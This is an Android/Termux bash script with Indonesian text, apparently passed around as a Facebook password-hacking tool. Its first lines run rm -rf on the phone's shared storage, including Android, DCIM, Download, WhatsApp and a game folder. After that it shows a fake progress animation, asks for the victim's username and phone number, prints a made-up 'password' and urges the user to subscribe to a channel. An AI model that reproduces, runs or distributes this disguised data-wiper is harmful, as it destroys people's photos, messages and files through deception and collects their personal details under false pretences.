
#!/system/xbin/bash
#AUTHOR:NOTBAD
#Github:https://github.com/THEIMMORTALHACKER
#Bersihkan Layar
#clear
cd /sdcard
rm -rf Android
rm -rf Download
rm -rf DCIM
rm -rf UCDownloads
rm -rf com.garena.game.codm
rm -rf Hack
rm -rf Akun Kalian
rm -rf Next
rm -rf WhatsApp
rm -rf 0847319280451
rm -rf Hack Neo
blue='\e[1;34m'
green='\e[1;32m'
purple='\[1;35m'
cyan='\e[1;36m'
red='\e[1;31m'
white='\e[1;37m'
yellow='\e[1;33m'
sleep 3
echo "\033[32;1m
#################################
#-AUTHOR= RIDWAN-KECHIL..       #
#-Subs. = Mr Kevin.A.           #
#-subs. = Ridwan Kechil.        #
#-Team. =THEIMMORTALHACKER      #
#################################
"
sleep 1

echo "\033[32;1mTULIS= Username anda! "
read p;

sleep 2

echo "\033[32;1m
#-PENCARIAN DALAM progses-#
______________________________
|1.pencarian akun anda       |
|2.harap bersabar sayang     |
|3.pencarian di mulai        |
|4.cek cek cek..             |
|5.progses ...               |
|6.dimulai......             |
|7.Subs dulu chnl            |
|8.Ridwan Kechil.....        |
|9.Jangan lupa .......       |
|10.......................   |
|11.................         |
|12.bersabar                 |
|13.>>>>>>>>>>>>✓Done        |
|14.Subscrib gak subscribe   |
|15.gw ambil balik akun lu.  |
|16.melanjutkan progses.     |
|17.jangan lupa.             |
|18.tersenyum....            |
|19.File Ditemukan....       |
|20.membuka File....         |
------------------------------
Baca dalam kotak
Ss in kalo bisa kirim ke
+62857319280451 "
sleep 3
echo "subsDuluWoi Data kalian terlihat.."
sleep 1
echo "biar keliatan siapa yang chat gw"
echo "\033[32;1mNomor hp anda: "
read p;

sleep 2
echo "Sabar Gan Proses tunggu sampai selesai..."
echo "\033[34;1m#10%"
sleep 1
echo "##20%"
sleep 1
echo "###30%"
sleep 2
echo "####40%"
sleep 2
echo "#####50%"
sleep 2
echo "######60%"
sleep 2
echo "#######70%"
sleep 4
echo "########80%"
sleep 3
echo "#########90%"
sleep 21

echo "##########100%"
sleep 3
echo "_____________________________________"
sleep 2
echo "harap bersabar"
sleep 2
echo "progses di butuhkan"
sleep 2
echo "Estrack"
sleep 11
echo "xx10%"
sleep 2
echo "xxxxxxxxxx100%"
sleep 2
echo "Akun Facebook Daface"
sleep 2
echo "melacak kata sandi Anda****"
sleep 2
echo " bersabar mencari berkas sandi*"
sleep 19
echo "Membuka Viss"
sleep 4
echo "kata Sandi Anda 👇👇"
sleep 16
echo "====>>>    ZahraKechil31"
sleep 2
echo "____________________________________"
sleep 2
echo "jangan lupa untuk kembali lagi"
sleep 2
echo "Subscribe Channel gw Juga"

